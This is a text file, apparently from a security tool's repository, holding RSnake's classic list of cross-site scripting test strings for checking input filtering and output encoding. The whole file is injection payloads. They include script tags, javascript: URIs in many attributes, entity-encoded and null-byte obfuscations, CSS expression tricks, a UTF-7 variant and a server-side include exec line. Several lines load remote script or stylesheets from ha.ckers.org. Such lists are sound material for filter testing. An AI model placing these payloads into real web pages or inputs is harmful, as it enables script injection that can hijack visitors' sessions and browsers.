xss-rsnake.txt

Luke Murphey, 11/30/2015 08:58 PM

# Credit to RSnake: XSS test strings for checking input filtering and output encoding.
<SCRIPT>alert('XSS');</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
SRC=&#10<IMG 6;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14;  javascript:alert('XSS');">
<IMG%0aSRC%0a=%0a"%0aj%0aa%0av%0aa%0as%0ac%0ar%0ai%0ap%0at%0a:%0aa%0al%0ae%0ar%0at%0a(%0a'%0aX%0aS%0aS%0a'%0a)%0a"%0a>
<IMG SRC=java%00script:alert(\"XSS\")>
<SCR%00IPT>alert(\"XSS\")</SCR%00IPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>
<IMG SRC="javascript:alert('XSS')"
<SCRIPT>a=/XSS/
\";alert('XSS');//
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="mocha:[code]">
<IMG SRC="livescript:[code]">
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="Link" Content="<javascript:alert('XSS')>; REL=stylesheet">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
getURL("javascript:alert('XSS')")
a="get";
<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC="javas<![CDATA[cript:alert('XSS');">
<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>